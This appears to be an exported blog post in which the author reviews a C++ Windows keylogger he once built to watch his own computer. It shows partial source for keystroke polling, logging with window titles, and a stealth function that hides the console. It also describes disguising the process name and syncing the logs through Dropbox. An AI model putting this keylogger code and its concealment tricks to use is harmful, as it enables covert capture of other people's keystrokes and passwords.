{"id":228,"date":"2016-08-18T19:32:56","date_gmt":"2016-08-19T02:32:56","guid":{"rendered":"http:\/\/konukoii.com\/blog\/?p=228"},"modified":"2016-10-22T22:01:07","modified_gmt":"2016-10-23T05:01:07","slug":"capture-the-keys-chapter-1-clogger","status":"publish","type":"post","link":"https:\/\/konukoii.com\/blog\/2016\/08\/18\/capture-the-keys-chapter-1-clogger\/","title":{"rendered":"Capture the Keys - Chapter 1: Clogger"},"content":{"rendered":"Reading Time: <\/span> 3<\/span> minutes<\/span><\/span>

When I first arrived at UCSB, I realized that this was the first time I would be living with roommates (that weren't family). I had a Windows machine and I had recently just learned how easy it was to break Windows Passwords (In fact, I had just made some money helping some family friends recover some of their lost passwords). Thus, I was a bit worried about unwanted smart people rummaging through my computer. It occurred to me that this was a perfect excuse to build a simple keylogger. Besides, keyloggers had always fascinated me, simply because they were flashy and appeared in the news any time someone was talking about the dangers of computer hackers.<\/p>\n

My first intuition was that since C++ was so low-level (when compared to other languages), keylogging with it had to be\u00a0simple and efficient.\u00a0In a week or so, I whipped up a ~280ish line program. Note that my keylogger relied on the window.h and windowuser.h libraries, because it was intended for use in my Windows machine.<\/p>\n

Now, after a few years have passed, I\u00a0wanted to do a small post-mortem of this code. Bare with me as we dive into some half-cooked old old code!<\/strong><\/em><\/p>\n

On my main()<\/strong> I was initially using GetAsyncKeyState()<\/strong> from windows.h<\/strong> to check for each keystate. Essentially \u00a0checking all keys, which have addresses from 8 to 255. The line GetAsyncKeyState(i) == -32767<\/strong> is a bit hacky, but that is what this function returns if a key was just pressed and released. (Although apparently this isn't the best way to do it<\/a>.)<\/p>\n

 <\/p>\n

\r\nunsigned char i;\r\n    while (true) {\r\n    for (i = 8; i <= 255; i++) {\r\n        if (GetAsyncKeyState(i) == -32767){\r\n            int a = log(i,"LOG.txt");\r\n        }\r\n    }\r\n}\r\n<\/pre>\n
 <\/p>\n
The log(key,file) function is where the magic happens, it takes a key that has been pressed, passes it through a filter function (explained later), figures out the focused window where the keypress was collected from and saves all that info to the log file. Here is a shortened version of the log function that focuses on the important parts.<\/p>\n
\r\nint log(int key,char* file){\r\n    fstream outFile(file,ios::out | ios::app);\r\n\r\n    \/\/etc, etc, etc ....\r\n    if (!isSameWindow()){\r\n        outFile << "\\n\\n *\/\\n\/*" << windowName << endl;\r\n        outFile << ">>---------------------------------------\\n\\n";\r\n    }\r\n    savePrevWindow();\r\n    \r\n    \/\/etc, etc, etc ....\r\n\r\n    key = filter(key);\r\n    print(key);\r\n    outFile << (char) key;\r\n    \r\n    outFile.close();\r\n \r\n savePrevWindow();\r\n}\r\n<\/pre>\n
The filter(key) function simply checks if (Shift)<\/strong> or (Caps Lock)<\/strong>\u00a0are being pressed, and if so, it accounts for them. In other words, when you get a keypress for the (1)<\/strong> key, if (Shift)<\/strong>\u00a0is also being pressed, then the actual character that should be logged is\u00a0(!)<\/strong>.<\/p>\n
\r\nif (hookShift()){\r\n    if (key == 186){key = ':';}\r\n    else if (key == 187){key = '+';}\r\n    \/\/...etc, etc, etc.\r\n}\r\n<\/pre>\n
 <\/p>\n
To figure out what screen is on the foreground (where the user is typing) we simply use the GetWindowText()<\/strong> and GetForegroundWindow()<\/strong> from windowuser.h<\/strong>.<\/p>\n
\r\nvoid savePrevWindow(){\r\n    HWND hwnd=GetForegroundWindow();\r\n    int test=GetWindowText(hwnd,prevWindow,80); \r\n}\r\n\r\nbool isSameWindow(){\r\n    HWND hwnd=GetForegroundWindow(); \r\n    int test=GetWindowText(hwnd,windowName,80); \r\n    if (strcmp(windowName,prevWindow) == 0){\r\n        return true;\r\n    }\r\n    else{ return false;}\r\n}\r\n<\/pre>\n
Last, but not least, we have a fancy-pants function to hide our keylogger from plain sight. Essentially it opens a hidden console and runs there. The only way the user will notice this is if they look into their Task Manager.<\/p>\n
<\/pre>\n
\r\nvoid stealth(){\r\n HWND stealth; \/\/Name of the Console \r\n AllocConsole(); \/\/Allocates New Console\r\n stealth = FindWindowA("ConsoleWindowClass", NULL); \/\/Finds Window\r\n MoveWindow(stealth,-300,-700,0,0,TRUE); \/\/Moves Window out of Sight\r\n ShowWindow(stealth,0); \/\/Cloaks Window\r\n \/\/Not necessary. But feel free to play around with this:\r\n \/\/SetPriorityClass(GetCurrentProcess(),HIGH_PRIORITY_CLASS);\r\n}\r\n<\/pre>\n
I compiled this code with g++ on Cygwin and called it something benign such as \"Windows System Checker\", so that even if someone opened the Task Manager, my keylogger would not arrise suspicion.<\/p>\n
Now, since the move-in date was approaching soon. I decided to forget about building an email module that would alert me and send log files when somebody was accessing my computer, instead I piggybacked on Dropbox, which I already had installed on my computer. So the program ran and saved files into Dropbox folders which would automatically update and thus alert me on my phone or other computers.<\/p>\n
I ran this keylogger for a while, but it did have one major drawback: CPU consumption. For some reason that is still rather unknown to me, it takes up to 50% CPU usage. That is insane, and honestly quite ridiculous for any self-respected keylogger.<\/p>\n
Seeing this, I decided to abandon my C++ prototype and try something different.<\/p>\n
I decided to try Python....<\/p>\n
[Continue to \"Capture the Keys - Chapter 2: Plogger\"]<\/a><\/p>\n
 <\/p>\n
Complete Code<\/h4>\n